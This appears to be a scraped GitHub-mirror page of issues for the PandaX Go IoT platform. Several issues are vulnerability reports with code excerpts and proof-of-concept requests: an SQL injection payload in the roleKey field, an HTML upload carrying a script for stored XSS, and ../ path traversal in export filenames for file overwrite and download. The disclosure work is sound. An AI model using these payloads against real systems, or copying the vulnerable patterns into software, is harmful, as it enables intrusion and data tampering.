pandaxgo / pandax Goto Github PK

🎉🔥PandaX是Go语言开源的企业级物联网平台低代码开发基座，基于go-restful+Vue3.0+TypeScript+vite3+element-Plus的前后端分离开发。支持设备管控，规则链，云组态，可视化大屏，报表设计器，表单设计器，代码生成器等功能。能帮助你快速建立IOT物联网平台等相关业务系统。

Home Page: http://www.pandax.vip/

License: GNU Affero General Public License v3.0

Dockerfile 0.04% Go 99.82% Batchfile 0.01% Shell 0.13%

go-admin iot iot-platform rulechain rules-engine admin

pandax's People

Contributors

Stargazers

Watchers

Forkers

tengfeilong li8023ning pandagoadmin itsharex 26597925 tobyzxj pengge cndatabiz 7terorr benbenwa lonelyxmas onemiless piaoxue88 shiguang2023 bulldba sz-winner jerrytu61 yclinks 743869423 hi-noikiy yixuqiu duke-isku bradbann kshdb langzimu zfg88287508 l1nyz-tel octopuslian edward-jackie xsafetech yangxin1994 xdnice zhanglei rookylu davidfang hengyuyao yanmf henan01 avey777 dragocytus igoogle-ink frank-webs xuzhicheng931205 zhukai1991 weirelite

pandax's Issues

我觉得贵项目对错误的处理非常不负责、、

我觉得贵项目对错误的处理非常不负责、、遇到错误直接pannic。。整个程序退出、、奇奇怪怪！

service "pandax" depends on undefined service mysql-server: invalid compose project

执行docker-compose up 命令后出现service "pandax" depends on undefined service mysql-server: invalid compose project

示例链接无法进入，猜测接口跨域

pandax sql 注入

修改角色信息这里

PandaX/apps/system/router/role.go

Lines 49 to 61 in 3d26520

    
           ws.Route(ws.POST("").To(func(request *restful.Request, response *restful.Response) { 
        
           	restfulx.NewReqCtx(request, response).WithLog("添加角色信息").Handle(s.InsertRole) 
        
           }). 
        
           	Doc("添加角色信息"). 
        
           	Metadata(restfulspec.KeyOpenAPITags, tags). 
        
           	Reads(entity.SysRole{})) 
        
           ws.Route(ws.PUT("").To(func(request *restful.Request, response *restful.Response) { 
        
           	restfulx.NewReqCtx(request, response).WithLog("修改角色信息").Handle(s.UpdateRole) 
        
           }). 
        
           	Doc("修改角色信息"). 
        
           	Metadata(restfulspec.KeyOpenAPITags, tags). 
        
           	Reads(entity.SysRole{}))

进入 InsertRole 或者 UpdateRole 这两个函数

PandaX/apps/system/api/role.go

Lines 51 to 82 in 3d26520

    
           // InsertRole 创建角色 
        
           func (r *RoleApi) InsertRole(rc *restfulx.ReqCtx) { 
        
           	var role entity.SysRole 
        
           	restfulx.BindJsonAndValid(rc, &role) 
        
           	role.CreateBy = rc.LoginAccount.UserName 
        
           	if role.DataScope == "" { 
        
           		role.DataScope = "0" 
        
           	} 
        
           	// 添加角色对应的菜单 
        
           	insert := r.RoleApp.Insert(role) 
        
           	role.RoleId = insert.RoleId 
        
           	r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds) 
        
           	//添加权限 
        
           	ca := casbin.CasbinService{ModelPath: global.Conf.Casbin.ModelPath} 
        
           	ca.UpdateCasbin(role.RoleKey, role.ApiIds) 
        
           } 
        
           // UpdateRole 修改用户角色 
        
           func (r *RoleApi) UpdateRole(rc *restfulx.ReqCtx) { 
        
           	var role entity.SysRole 
        
           	restfulx.BindJsonAndValid(rc, &role) 
        
           	role.UpdateBy = rc.LoginAccount.UserName 
        
           	// 修改角色 
        
           	r.RoleApp.Update(role) 
        
           	// 删除角色的菜单绑定 
        
           	r.RoleMenuApp.DeleteRoleMenu(role.RoleId) 
        
           	// 添加角色菜单绑定 
        
           	r.RoleMenuApp.Insert(role.RoleId, role.MenuIds) 
        
           	//修改api权限 
        
           	ca := casbin.CasbinService{ModelPath: global.Conf.Casbin.ModelPath} 
        
           	ca.UpdateCasbin(role.RoleKey, role.ApiIds) 
        
           }

之后会进入 r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds)
此处存在 sql 语句拼接，没有使用预编译，可以进行拼接执行 sql 注入

PandaX/apps/system/services/role_menu.go

Lines 31 to 53 in 3d26520

    
           func (m *sysRoleMenuImpl) Insert(roleId int64, menuId []int64) bool { 
        
           	var role entity.SysRole 
        
           	biz.ErrIsNil(global.Db.Table("sys_roles").Where("role_id = ?", roleId).First(&role).Error, "查询角色失败") 
        
           	var menu []entity.SysMenu 
        
           	biz.ErrIsNil(global.Db.Table("sys_menus").Where("menu_id in (?)", menuId).Find(&menu).Error, "查询菜单失败") 
        
           	//拼接 sql 串 
        
           	sql := "INSERT INTO sys_role_menus (role_id,menu_id,role_name) VALUES " 
        
           	for i := 0; i < len(menu); i++ { 
        
           		if len(menu)-1 == i { 
        
           			//最后一条数据 以分号结尾 
        
           			sql += fmt.Sprintf("(%d,%d,'%s');", role.RoleId, menu[i].MenuId, role.RoleKey) 
        
           		} else { 
        
           			sql += fmt.Sprintf("(%d,%d,'%s'),", role.RoleId, menu[i].MenuId, role.RoleKey) 
        
           		} 
        
           	} 
        
           	biz.ErrIsNil(global.Db.Exec(sql).Error, "新增角色菜单失败") 
        
           	return true 
        
           }

漏洞验证

POST http://127.0.0.1:7788/system/role HTTP/1.1
Host: 127.0.0.1:7788
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Origin: http://127.0.0.1:7788
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySWQiOjEsIlRlbmFudElkIjowLCJPcmdhbml6YXRpb25JZCI6MiwiVXNlck5hbWUiOiJwYW5kYSIsIlJvbGVJZCI6MSwiUm9sZUtleSI6ImFkbWluIiwiRGVwdElkIjowLCJQb3N0SWQiOjQsImV4cCI6MTcxMDU5Mjk1MiwiaXNzIjoiUGFuZGFYIiwibmJmIjoxNzA5OTg3MTUyfQ.tz99RC1K83NjuNVNlw2p2Shq1gS1Y2MVTbbhR1_610Q
If-Modified-Since: Sat, 09 Mar 2024 08:08:22 GMT
Connection: close
Content-Length: 96

{"roleName":"11","roleKey":"tes12'),(114,514,'123');#","roleSort":2,"menuIds":[106],"apiIds":[]}

pandax 任意文件后缀上传 xss

PandaX/apps/system/router/upload.go

Lines 17 to 23 in 3d26520

    
           ws.Route(ws.POST("/up").To(func(request *restful.Request, response *restful.Response) { 
        
           	restfulx.NewReqCtx(request, response).WithLog("上传图片").Handle(s.UploadImage) 
        
           }). 
        
           	Doc("上传图片"). 
        
           	Param(ws.FormParameter("imagefile", "文件")). 
        
           	Metadata(restfulspec.KeyOpenAPITags, tags). 
        
           	Returns(200, "OK", map[string]string{}))

进入 UploadImage 处理函数

没有对文件后缀名做限制，可以上传 html 文件，之后打存储型 xss

PandaX/apps/system/api/upload.go

Lines 21 to 29 in 3d26520

    
           // UploadImage 图片上传 
        
           func (up *UploadApi) UploadImage(rc *restfulx.ReqCtx) { 
        
           	_, fileHeader, err := rc.Request.Request.FormFile("file") 
        
           	biz.ErrIsNil(err, "请传入文件") 
        
           	local := &tool.Local{Path: filePath} 
        
           	link, fileName, err := local.UploadFile(fileHeader) 
        
           	biz.ErrIsNil(err, "文件上传失败") 
        
           	rc.ResData = map[string]string{"fileName": fileName, "filePath": link} 
        
           }

POST http://193.112.70.4:7788/upload/up HTTP/1.1
Host: 193.112.70.4:7788
Content-Length: 217
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
X-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySWQiOjEsIlRlbmFudElkIjowLCJPcmdhbml6YXRpb25JZCI6MiwiVXNlck5hbWUiOiJwYW5kYSIsIlJvbGVJZCI6MSwiUm9sZUtleSI6ImFkbWluIiwiRGVwdElkIjowLCJQb3N0SWQiOjQsImV4cCI6MTcxMDU5Mjk1MiwiaXNzIjoiUGFuZGFYIiwibmJmIjoxNzA5OTg3MTUyfQ.tz99RC1K83NjuNVNlw2p2Shq1gS1Y2MVTbbhR1_610Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9MrP9bCRbyYvHS2
Accept: */*
Origin: http://www.pandax.vip:7789

------WebKitFormBoundaryU9MrP9bCRbyYvHS2
Content-Disposition: form-data; name="file"; filename="1.html"
Content-Type: text/css

<script>alert(document.domain)</script>
------WebKitFormBoundaryU9MrP9bCRbyYvHS2--

pandax excel 导出任意文件覆盖或任意文件下载

PandaX/apps/system/router/user.go

Lines 153 to 161 in 3d26520

    
           ws.Route(ws.GET("/export").To(func(request *restful.Request, response *restful.Response) { 
        
           	restfulx.NewReqCtx(request, response).WithLog("导出用户信息").Handle(s.ExportUser) 
        
           }). 
        
           	Doc("导出用户信息"). 
        
           	Param(ws.QueryParameter("filename", "filename").DataType("string")). 
        
           	Param(ws.QueryParameter("status", "status").DataType("string")). 
        
           	Param(ws.QueryParameter("username", "username").DataType("string")). 
        
           	Param(ws.QueryParameter("phone", "phone").DataType("string")). 
        
           	Metadata(restfulspec.KeyOpenAPITags, tags))

PandaX/apps/system/router/role.go

Lines 84 to 92 in 3d26520

    
           ws.Route(ws.GET("/export").To(func(request *restful.Request, response *restful.Response) { 
        
           	restfulx.NewReqCtx(request, response).WithLog("导出角色信息").Handle(s.ExportRole) 
        
           }). 
        
           	Doc("导出角色信息"). 
        
           	Param(ws.QueryParameter("filename", "filename").DataType("string")). 
        
           	Param(ws.QueryParameter("status", "status").DataType("string")). 
        
           	Param(ws.QueryParameter("roleName", "roleName").DataType("string")). 
        
           	Param(ws.QueryParameter("roleKey", "roleKey").DataType("string")). 
        
           	Metadata(restfulspec.KeyOpenAPITags, tags))

PandaX/apps/system/router/dict.go

Lines 65 to 73 in 3d26520

    
           ws.Route(ws.GET("/type/export").To(func(request *restful.Request, response *restful.Response) { 
        
           	restfulx.NewReqCtx(request, response).WithLog("导出字典类型信息").Handle(s.ExportDictType) 
        
           }). 
        
           	Doc("导出字典类型信息"). 
        
           	Param(ws.QueryParameter("filename", "filename").DataType("string")). 
        
           	Param(ws.QueryParameter("status", "status").DataType("string")). 
        
           	Param(ws.QueryParameter("dictName", "dictName").DataType("string")). 
        
           	Param(ws.QueryParameter("dictType", "dictType").DataType("string")). 
        
           	Metadata(restfulspec.KeyOpenAPITags, tags))

这三处路由，之后都会调用 utils.InterfaceToExcel(*list, fileName) 然后 rc.Download(fileName)

选其中一个来看

代码中没有对传入的 filename 做检查，使用 ../ 跨目录指定导出的 excel 文件名及目录位置，可以用来覆盖掉不应该覆盖的文件

PandaX/apps/system/api/user.go

Lines 326 to 342 in 3d26520

    
           // ExportUser 导出用户 
        
           func (u *UserApi) ExportUser(rc *restfulx.ReqCtx) { 
        
           	filename := restfulx.QueryParam(rc, "filename") 
        
           	status := restfulx.QueryParam(rc, "status") 
        
           	username := restfulx.QueryParam(rc, "username") 
        
           	phone := restfulx.QueryParam(rc, "phone") 
        
           	var user entity.SysUser 
        
           	user.Status = status 
        
           	user.Username = username 
        
           	user.Phone = phone 
        
           	list := u.UserApp.FindList(user) 
        
           	fileName := utils.GetFileName(global.Conf.Server.ExcelDir, filename) 
        
           	utils.InterfaceToExcel(*list, fileName) 
        
           	rc.Download(fileName) 
        
           }

而且，如果该目标文件没有写权限的话，之后 rc.Download(fileName) 又会将这个文件下载下来，就变成了文件读取了

但是调用的是 http.ServeFile，只能用来读取项目目录下的文件，无法读取 /etc/passwd 等系统文件

PandaX/kit/restfulx/restfulx.go

Lines 84 to 92 in 3d26520

    
           // 文件下载 
        
           func Download(rc *ReqCtx, filename string) { 
        
           	rc.Response.Header().Add("success", "true") 
        
           	rc.Response.Header().Set("Content-Length", "-1") 
        
           	rc.Response.Header().Set("Content-Disposition", "attachment; filename="+filename) 
        
           	http.ServeFile( 
        
           		rc.Response.ResponseWriter, 
        
           		rc.Request.Request, filename) 
        
           }

比如这样子去覆盖掉 template 文件

pandaxgo / pandax Goto Github PK

pandax's People

Contributors

Stargazers

Watchers

Forkers

pandax's Issues

我觉得贵项目对错误的处理非常不负责、、

service "pandax" depends on undefined service mysql-server: invalid compose project

示例链接无法进入，猜测接口跨域

pandax sql 注入

pandax sql 注入

pandax 任意文件后缀上传 xss

pandax 任意文件后缀上传 xss

pandax excel 导出任意文件覆盖或任意文件下载

pandax excel 导出任意文件覆盖或任意文件下载

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent

	ws.Route(ws.POST("").To(func(request restful.Request, response restful.Response) {
	restfulx.NewReqCtx(request, response).WithLog("添加角色信息").Handle(s.InsertRole)
	}).
	Doc("添加角色信息").
	Metadata(restfulspec.KeyOpenAPITags, tags).
	Reads(entity.SysRole{}))

	ws.Route(ws.PUT("").To(func(request restful.Request, response restful.Response) {
	restfulx.NewReqCtx(request, response).WithLog("修改角色信息").Handle(s.UpdateRole)
	}).
	Doc("修改角色信息").
	Metadata(restfulspec.KeyOpenAPITags, tags).
	Reads(entity.SysRole{}))

	// InsertRole 创建角色
	func (r RoleApi) InsertRole(rc restfulx.ReqCtx) {
	var role entity.SysRole
	restfulx.BindJsonAndValid(rc, &role)
	role.CreateBy = rc.LoginAccount.UserName
	if role.DataScope == "" {
	role.DataScope = "0"
	}
	// 添加角色对应的菜单
	insert := r.RoleApp.Insert(role)
	role.RoleId = insert.RoleId
	r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds)
	//添加权限
	ca := casbin.CasbinService{ModelPath: global.Conf.Casbin.ModelPath}
	ca.UpdateCasbin(role.RoleKey, role.ApiIds)
	}

	// UpdateRole 修改用户角色
	func (r RoleApi) UpdateRole(rc restfulx.ReqCtx) {
	var role entity.SysRole
	restfulx.BindJsonAndValid(rc, &role)
	role.UpdateBy = rc.LoginAccount.UserName
	// 修改角色
	r.RoleApp.Update(role)
	// 删除角色的菜单绑定
	r.RoleMenuApp.DeleteRoleMenu(role.RoleId)
	// 添加角色菜单绑定
	r.RoleMenuApp.Insert(role.RoleId, role.MenuIds)
	//修改api权限
	ca := casbin.CasbinService{ModelPath: global.Conf.Casbin.ModelPath}
	ca.UpdateCasbin(role.RoleKey, role.ApiIds)
	}

	func (m *sysRoleMenuImpl) Insert(roleId int64, menuId []int64) bool {

	var role entity.SysRole
	biz.ErrIsNil(global.Db.Table("sys_roles").Where("role_id = ?", roleId).First(&role).Error, "查询角色失败")

	var menu []entity.SysMenu
	biz.ErrIsNil(global.Db.Table("sys_menus").Where("menu_id in (?)", menuId).Find(&menu).Error, "查询菜单失败")

	//拼接 sql 串
	sql := "INSERT INTO sys_role_menus (role_id,menu_id,role_name) VALUES "

	for i := 0; i < len(menu); i++ {
	if len(menu)-1 == i {
	//最后一条数据以分号结尾
	sql += fmt.Sprintf("(%d,%d,'%s');", role.RoleId, menu[i].MenuId, role.RoleKey)
	} else {
	sql += fmt.Sprintf("(%d,%d,'%s'),", role.RoleId, menu[i].MenuId, role.RoleKey)
	}
	}
	biz.ErrIsNil(global.Db.Exec(sql).Error, "新增角色菜单失败")

	return true
	}

	ws.Route(ws.POST("/up").To(func(request restful.Request, response restful.Response) {
	restfulx.NewReqCtx(request, response).WithLog("上传图片").Handle(s.UploadImage)
	}).
	Doc("上传图片").
	Param(ws.FormParameter("imagefile", "文件")).
	Metadata(restfulspec.KeyOpenAPITags, tags).
	Returns(200, "OK", map[string]string{}))

	// UploadImage 图片上传
	func (up UploadApi) UploadImage(rc restfulx.ReqCtx) {
	_, fileHeader, err := rc.Request.Request.FormFile("file")
	biz.ErrIsNil(err, "请传入文件")
	local := &tool.Local{Path: filePath}
	link, fileName, err := local.UploadFile(fileHeader)
	biz.ErrIsNil(err, "文件上传失败")
	rc.ResData = map[string]string{"fileName": fileName, "filePath": link}
	}

	ws.Route(ws.GET("/export").To(func(request restful.Request, response restful.Response) {
	restfulx.NewReqCtx(request, response).WithLog("导出用户信息").Handle(s.ExportUser)
	}).
	Doc("导出用户信息").
	Param(ws.QueryParameter("filename", "filename").DataType("string")).
	Param(ws.QueryParameter("status", "status").DataType("string")).
	Param(ws.QueryParameter("username", "username").DataType("string")).
	Param(ws.QueryParameter("phone", "phone").DataType("string")).
	Metadata(restfulspec.KeyOpenAPITags, tags))

	ws.Route(ws.GET("/export").To(func(request restful.Request, response restful.Response) {
	restfulx.NewReqCtx(request, response).WithLog("导出角色信息").Handle(s.ExportRole)
	}).
	Doc("导出角色信息").
	Param(ws.QueryParameter("filename", "filename").DataType("string")).
	Param(ws.QueryParameter("status", "status").DataType("string")).
	Param(ws.QueryParameter("roleName", "roleName").DataType("string")).
	Param(ws.QueryParameter("roleKey", "roleKey").DataType("string")).
	Metadata(restfulspec.KeyOpenAPITags, tags))

	ws.Route(ws.GET("/type/export").To(func(request restful.Request, response restful.Response) {
	restfulx.NewReqCtx(request, response).WithLog("导出字典类型信息").Handle(s.ExportDictType)
	}).
	Doc("导出字典类型信息").
	Param(ws.QueryParameter("filename", "filename").DataType("string")).
	Param(ws.QueryParameter("status", "status").DataType("string")).
	Param(ws.QueryParameter("dictName", "dictName").DataType("string")).
	Param(ws.QueryParameter("dictType", "dictType").DataType("string")).
	Metadata(restfulspec.KeyOpenAPITags, tags))

	// ExportUser 导出用户
	func (u UserApi) ExportUser(rc restfulx.ReqCtx) {
	filename := restfulx.QueryParam(rc, "filename")
	status := restfulx.QueryParam(rc, "status")
	username := restfulx.QueryParam(rc, "username")
	phone := restfulx.QueryParam(rc, "phone")

	var user entity.SysUser
	user.Status = status
	user.Username = username
	user.Phone = phone

	list := u.UserApp.FindList(user)
	fileName := utils.GetFileName(global.Conf.Server.ExcelDir, filename)
	utils.InterfaceToExcel(*list, fileName)
	rc.Download(fileName)
	}

	// 文件下载
	func Download(rc *ReqCtx, filename string) {
	rc.Response.Header().Add("success", "true")
	rc.Response.Header().Set("Content-Length", "-1")
	rc.Response.Header().Set("Content-Disposition", "attachment; filename="+filename)
	http.ServeFile(
	rc.Response.ResponseWriter,
	rc.Request.Request, filename)
	}

pandaxgo / pandax Goto Github PK

pandax's People

Contributors

Stargazers

Watchers

Forkers

pandax's Issues

pandax sql 注入

pandax 任意文件后缀上传 xss

pandax excel 导出任意文件覆盖 或 任意文件下载

Recommend Projects

Recommend Topics

Recommend Org

pandax excel 导出任意文件覆盖或任意文件下载